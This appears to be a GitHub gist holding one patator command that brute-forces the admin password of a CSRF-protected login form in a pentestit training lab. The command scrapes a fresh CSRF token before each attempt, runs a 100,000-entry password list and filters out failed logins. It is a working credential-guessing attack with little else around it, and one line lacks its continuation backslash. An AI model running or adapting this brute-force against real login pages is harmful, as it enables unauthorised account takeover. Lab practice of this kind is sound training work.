Skip to content

Instantly share code, notes, and snippets.

@VGostyuzhov
Created March 30, 2018 14:28
Show Gist options
  • Save VGostyuzhov/0dc0972505bdd8c6e9f42036ac5aa89d to your computer and use it in GitHub Desktop.
Save VGostyuzhov/0dc0972505bdd8c6e9f42036ac5aa89d to your computer and use it in GitHub Desktop.
Patator brute for CSRF protected login form in pentestit.lab10
patator http_fuzz \
url="http://192.168.101.10:88/index.php?module=Users&action=Login" \
body='__vtrftk=_CSRF_&username=admin&password=FILE0' \
0="~/SecLists/Passwords/10_million_password_list_top_100000.txt"
method=POST \
accept_cookie=1 \
follow=1 \
--threads 1 \
timeout=60 \
timeout_tcp=60 \
header='Cookie: PHPSESSID=25a0d95f595e31367632a' \
before_urls="http://192.168.101.10:88/index.php?module=Users&action=Login" \
before_header='Cookie: PHPSESSID=25a0d95f595e31367632a' \
before_egrep='_CSRF_:(?<=csrfMagicToken = ")(.*?)(?=;)' \
-x ignore:fgrep="Invalid username or password"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment